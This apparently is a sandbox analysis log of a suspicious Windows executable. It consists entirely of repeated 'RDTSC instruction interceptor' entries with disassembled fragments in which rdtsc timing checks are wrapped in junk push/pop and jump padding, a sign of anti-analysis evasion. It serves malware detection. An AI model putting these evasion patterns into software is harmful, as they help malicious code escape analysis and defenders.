Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12C987C second address: 12C98BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E8Dh 0x00000007 jns 00007F4970D67E86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jne 00007F4970D67EA5h 0x00000015 jnc 00007F4970D67E86h 0x0000001b jmp 00007F4970D67E99h 0x00000020 push esi 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12C98BC second address: 12C98C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12C9E9A second address: 12C9E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12C9E9E second address: 12C9EA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12C9EA4 second address: 12C9EE1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4970D67E8Ch 0x00000008 pushad 0x00000009 jmp 00007F4970D67E93h 0x0000000e jmp 00007F4970D67E8Bh 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b js 00007F4970D67E86h 0x00000021 push esi 0x00000022 pop esi 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12C9EE1 second address: 12C9EEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12CA47E second address: 12CA483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12CA791 second address: 12CA7B0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F4970E062C8h 0x00000008 pushad 0x00000009 jmp 00007F4970E062D0h 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12CA90B second address: 12CA91A instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4970D67E8Ah 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12CA91A second address: 12CA920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12CA920 second address: 12CA92C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12CA92C second address: 12CA932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12CA932 second address: 12CA959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4970D67E96h 0x00000009 popad 0x0000000a jmp 00007F4970D67E8Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12CA959 second address: 12CA977 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 jmp 00007F4970E062D3h 0x0000000c popad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 125EB49 second address: 125EB5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4970D67E92h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129CEEC second address: 129CF04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4970E062D4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129CF04 second address: 127AF1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+1244DC4Ch], ebx 0x00000011 call dword ptr [ebp+122D23FEh] 0x00000017 ja 00007F4970D67E9Ah 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 js 00007F4970D67E86h 0x00000026 push ecx 0x00000027 pop ecx 0x00000028 popad 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129D3F6 second address: 129D3FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129D468 second address: 129D46E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129D60C second address: 129D612 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129D612 second address: 129D61C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F4970D67E86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129D61C second address: 129D638 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4970E062C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], esi 0x0000000f movsx edi, bx 0x00000012 nop 0x00000013 pushad 0x00000014 jns 00007F4970E062CCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129D763 second address: 129D769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129D769 second address: 129D7BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jl 00007F4970E062CCh 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 jmp 00007F4970E062CBh 0x0000001e mov eax, dword ptr [eax] 0x00000020 pushad 0x00000021 ja 00007F4970E062C8h 0x00000027 jp 00007F4970E062D7h 0x0000002d popad 0x0000002e mov dword ptr [esp+04h], eax 0x00000032 pushad 0x00000033 push edx 0x00000034 push ebx 0x00000035 pop ebx 0x00000036 pop edx 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129D7BD second address: 129D7C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129DA21 second address: 129DA27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129DA27 second address: 129DA38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4970D67E8Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129DEA0 second address: 129DEA6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129DEA6 second address: 129DEC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129DEC8 second address: 129DED2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129E010 second address: 129E014 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129E014 second address: 129E01A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129E01A second address: 129E036 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E93h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129E268 second address: 129E27B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c js 00007F4970E062C6h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129E27B second address: 129E2D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jng 00007F4970D67E86h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f mov edi, 3AAA6E30h 0x00000014 lea eax, dword ptr [ebp+12482CF8h] 0x0000001a sub dx, 2100h 0x0000001f push eax 0x00000020 jmp 00007F4970D67E8Ah 0x00000025 mov dword ptr [esp], eax 0x00000028 mov edi, dword ptr [ebp+122D1BCFh] 0x0000002e lea eax, dword ptr [ebp+12482CB4h] 0x00000034 jp 00007F4970D67E88h 0x0000003a mov edi, esi 0x0000003c nop 0x0000003d push eax 0x0000003e push eax 0x0000003f push ebx 0x00000040 pop ebx 0x00000041 pop eax 0x00000042 pop eax 0x00000043 push eax 0x00000044 push ecx 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F4970D67E8Eh 0x0000004c rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 129E2D5 second address: 127BA5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 and edi, dword ptr [ebp+122D2ACDh] 0x0000000e mov dword ptr [ebp+124506D8h], ecx 0x00000014 call dword ptr [ebp+122D2248h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d jno 00007F4970E062C6h 0x00000023 pushad 0x00000024 popad 0x00000025 pop eax 0x00000026 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 127BA5E second address: 127BA7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E90h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4970D67E8Ah 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 127BA7E second address: 127BA8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970E062CBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12D08AC second address: 12D08C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F4970D67E94h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12D08C8 second address: 12D08CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12D08CD second address: 12D08D2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12D0BBA second address: 12D0BC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12D0BC0 second address: 12D0BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4970D67E98h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12D0BDC second address: 12D0BE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12D0D3C second address: 12D0D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4970D67E99h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12D0D62 second address: 12D0D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12D0D66 second address: 12D0D7E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4970D67E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4970D67E8Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12D7396 second address: 12D73BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4970E062C6h 0x0000000a pop edx 0x0000000b jns 00007F4970E062DBh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12D73BC second address: 12D73C1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12D62D2 second address: 12D62D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12D62D7 second address: 12D62E1 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4970D67E8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12D62E1 second address: 12D6304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F4970E062C6h 0x0000000f jmp 00007F4970E062D4h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12D6C20 second address: 12D6C24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12D6C24 second address: 12D6C36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F4970E062C6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12D6C36 second address: 12D6C3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12D6C3A second address: 12D6C40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12D6C40 second address: 12D6C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pushad 0x0000000a popad 0x0000000b jp 00007F4970D67E86h 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12D6C58 second address: 12D6C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12D6DB0 second address: 12D6DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12D6DB4 second address: 12D6DCE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4970E062C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4970E062D0h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12D6DCE second address: 12D6DDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F4970D67E86h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12D708A second address: 12D70A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F4970E062D2h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12DCA77 second address: 12DCA7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12DCA7D second address: 12DCA81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12DCA81 second address: 12DCA8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12DCBAD second address: 12DCBB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F4970E062C6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12DCBB9 second address: 12DCBDC instructions: 0x00000000 rdtsc 0x00000002 js 00007F4970D67E86h 0x00000008 jmp 00007F4970D67E8Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jl 00007F4970D67E86h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12DCEA1 second address: 12DCEA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12DCFF0 second address: 12DCFFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12DCFFB second address: 12DD018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F4970E062C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4970E062CEh 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12DD018 second address: 12DD01C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12DD178 second address: 12DD17E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12DD17E second address: 12DD1AC instructions: 0x00000000 rdtsc 0x00000002 je 00007F4970D67E86h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F4970D67E91h 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007F4970D67E86h 0x0000001c jnc 00007F4970D67E86h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12DD1AC second address: 12DD1BC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F4970E062C6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12DD1BC second address: 12DD1C6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4970D67E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12DD5D0 second address: 12DD5F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4970E062D7h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F4970E062C6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12DD5F4 second address: 12DD610 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970D67E96h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12DD768 second address: 12DD7B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4970E062D2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F4970E062D4h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F4970E062D8h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a popad 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12DD7B9 second address: 12DD7C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12DC5CA second address: 12DC5CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12DC5CE second address: 12DC5F4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4970D67E86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F4970D67E96h 0x00000010 push edi 0x00000011 pop edi 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12E1058 second address: 12E105E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12E4560 second address: 12E4566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12E4566 second address: 12E4570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12E4570 second address: 12E457F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pushad 0x00000007 jc 00007F4970D67E8Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12E6976 second address: 12E6980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SwJD3kiOwV.exe	RDTSC instruction interceptor: First address: 12E6980 second address: 12E6989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
